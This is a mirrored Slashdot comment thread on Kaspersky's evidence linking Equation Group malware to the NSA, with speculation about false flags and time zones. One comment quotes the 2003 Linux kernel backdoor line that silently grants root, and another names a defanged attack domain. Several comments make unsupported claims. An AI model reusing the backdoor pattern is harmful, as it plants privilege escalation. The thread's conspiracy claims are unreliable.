Slashdot Mirror
New Evidence Strengthens NSA Ties To Equation Group Malware
An anonymous reader writes: When researchers from Kaspersky Lab presented the Equation Group espionage malware, many in the security community were convinced it was part of an NSA operation. Now, Kaspersky has released new evidence that only strengthens those suspicions. In a code sample, they found a string named BACKSNARF_AB25, which happens to be the name of a project in the NSA's Tailored Access Operations. Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States. The authors also tended to work Monday through Friday, and not on the weekends, suggesting a large, organized development team. "Whereas before the sprawling Equation Drug platform was known to support 35 different modules, Kaspersky has recently unearthed evidence there are 115 separate plugins. The architecture resembles a mini operating system with kernel- and user-mode components alike."
I am glad our best and brightest are better than their best and brightest... keeping us safe from cyber-terrorism is a huge priority.
Because we believe Putin does not own that company in Moscow or is using it to own anyone running the antivirus tools on their machines. Lets hear it for the Belief and hope system.
Seems like very weak evidence to me, and certainly not a "smoking gun" claimed in the referenced article.
Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States
Um, the US is on UTC -5:00 (ET) through UTC -8:00 (PT). My money is on those pesky Greenlandic uber-hackers.
Hypothetical Scenario: I work as a coder for the NSA, I work with an extremely talented group, we code the latest, most aggressive malware available.
We make the Russians look like Girl Scouts.
How much do you think they pay me?
How much could I make selling the stuff I code at the NSA to various "businesses".
Does anyone in that position believe in nationalism?
"If any question why we died, Tell them because our fathers lied."
Do me a favour. Spooks putting strings identifying their top secret programme by name into malware? Jesus Christ you people are gullible.
If they don't bother to change the timestamps to 03/13/37.
I am becoming gerund, destroyer of verbs.
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Slashdot social media options: AIM, ICQ, Yahoo, Jabber and Mobile Text. Why no MySpace?
Rats hoisted by their own profiling petard.
(-1: Post disagrees with my already-settled worldview) is not a valid mod option.
> Do me a favour. Spooks putting strings identifying their top secret programme by name [...]
The alternative is thrilling too: malware authors knowing the names of top-secret NSA programmes (I assume this malware was hacked together pre-Snowden)? Hmmm.
I don't know the name of the razor to apply here. But it's a hell of a razor, for sure.
Kind of like a PHD student security programmer, accidentally putting in heartbleed in the middle of Xmas when it was automagically accepted in to ssh code, because we do not teach bounds checking to PHD students.
Hope and Belief.
is to brand all timestamps and other traces in the malware, so as to implicate Russia and China, or whatever country or organization happens to be on the agenda.
How many of our own critical systems were offlined by these viruses when they got out in the world?
I mean, people have been struggling with this for years - google "fanny.bmp"
Maybe someone needs to look up just what parts of the world actually use UTC-0300.
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Remember nimda virus ? (thats admin backwards)
NIMDA was a polymorphic plague of a virus that hit out network right after 9/11/2001.
It would write itself all over every file on the disk drive until the drive was full and everything came to a screeching halt. It exploited the NT web service that was active by group policy default on client boxes with NT and or Win 2000. Anyway, our software engineers looked inside the Nimda.dll and there was some jihad "Death to America, Death to Israel" crap commented right into the file!!
I'm sure that was the NSA's earlier work, as they took over most domestic networks just to be on the safe side....
Lots of folks above posting about how the eastern US isn't in TZ UTC-3. If you RTF summary more carefully, they're talking about code timestamps being consistent with 8-5 UTC-3, which is also consistent with 7-4 UTC-4, or 6-3 UTC-5.
The company I work for (UTC-6) routinely has folks coming in as early as 6, with quite a few coming in between 7 and 8, just so they can beat the rush hours. Yes, even coders.
If you remember when some agent broke into a Linux source repository and added a disguised backdoor attack?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
Effectively letting them get root, if they passed those flags into the wait4 call.
It includes the name of the program, as known from the Snowden documents, so its a SIGNED CONFESSION.
Our NSA had damn well be better than Putin's and LiKeqiang's or all of us in the US are going to be irretrievably harmed.
1. Fake the time stamps to look lile eastern US
2. Add a well known NSA project name to the code
3. "Leak" information about these issues.
4. Profit
Could this information be a plant to point the finger at the NSA?
So what are you saying there? That we're the Nazi enemy now to be spied on like in the second world war?
Looking through the project names, I suspect the FREE* ones are all open source related. FOX* are maybe firefox attacks?
EFFABLELAMBDA, EFF? DARK* could be darknet attacks.
There's a much more indepth discussion about EquationGroup malware here:
http://www.wikileaks-forum.com/nsa/332/how-omnipotent-hackers-tied-to-nsa-hid-for-14-yearsand-were-found-at-last/33191/
Kaspersky Lab managed to register some of the attack domains as they expired and collect the data from old attacks. These domains are registered with US based Domains By Proxy, LLC. So if it was NOT official they should be easy to catch simply because they bought and paid and renewed the attack domains used!
e.g. standardsandpraiserepurpose[.]com was one of the attack domains and is registered with Domains By Proxy
I emailed Kaspersky asking if they were going to do something about this -- no answer. Seagate tech support continues to pretend it's a non-problem.
We are so screwed.
If every OS and system on the planet is merely your plaything, you are now not just a government agency but a standalone entity that can completely self-fund without leaving a trace, and thus answerable to no one, most especially mere elected civilians.
And if the Senators or POTUS get uppity, well no one that achieves those offices are innocent, thus they are completely blackmailable, if not subject to out and out threats (especially their families).
I think this is the main reason every man that now becomes President ends up with gray hair, regardless of their age.
https://www.youtube.com/watch?v=MGQaH3-LK54
Wasn't the US government condemning the hack of Sony pictures and instituting economic sanctions based on some shaky evidence that North Korea was involved? I wonder what actions the 42 plus countries that have been infected with Equation Group malware should take against the US government.
Sorry guys, I will never use the word "hacker" again now that they are officially called "Exploit Engineers".
Nae king! Nae laird! Nae yurrupiean pressedent! We willna be fooled again!
From the article: "Assuming they worked a regular 8 to 5 workday, the timestamps show the employees were likely in the UTC-3 or UTC-4 time zone, a finding that would be consistent with people working in the Eastern part of the US."
Neither UTC -03:00 nor UTC -04:00 are associated with the Eastern US.
UTC -03:00 is associated with: Buenos Aires, Montevideo, São Paulo
UTC -04:00 is associated with: Santiago, La Paz, San Juan de Puerto Rico, Manaus, Halifax
UTC -05:00, however, is however, associated with Eastern US.
Yes, timestamps could be altered.
And, the existence of a particular keyword does not imply NSA ties. It implies that somebody typed a known NSA keyword into the file.
I think Kaspersky likes to read about his brilliance in the pubs. Where's the selfie?
Back in my day, we only had an extra day of the week, not a whole month. You younguns are getting too greedy.
If I'm good enough to write a sophisticated and successful piece of malware, maybe I could change the time stamps and plant some not-so-secret codeword in order to trick people into thinking it was created by my adversary. ("False flag.")
OpenSSL not SSH.
For a largish project I would suspect that the release builds are run over night, CI builds during the work day.
I am very small, utmostly microscopic.
They do. The codewords are often randomly generated and deliberately meaningless. (The word list isn't 100% random, at least since Churchill decided he didn't want anyone to die over something called Operation Bunnyhug back in WW2.)
NSA's mistake was in assuming that the codewords would never leave the organization. Security by obscurity. Replacing codewords with 32-bit hex digits doesn't eliminate that risk.
Fucking NSA wants to see everything and every machine plugged into the Internet to be automatically compromised. Why are we paying our government to do this? They aren't at all concerned with making the net safer, they are concerned with taking it over. Fuck NSA.
Are they so lame and stuffy that they would not cover their butts?
Kaspersky is a KGB front, an incredibly complex operation with built in denial it run by a pretend dissident.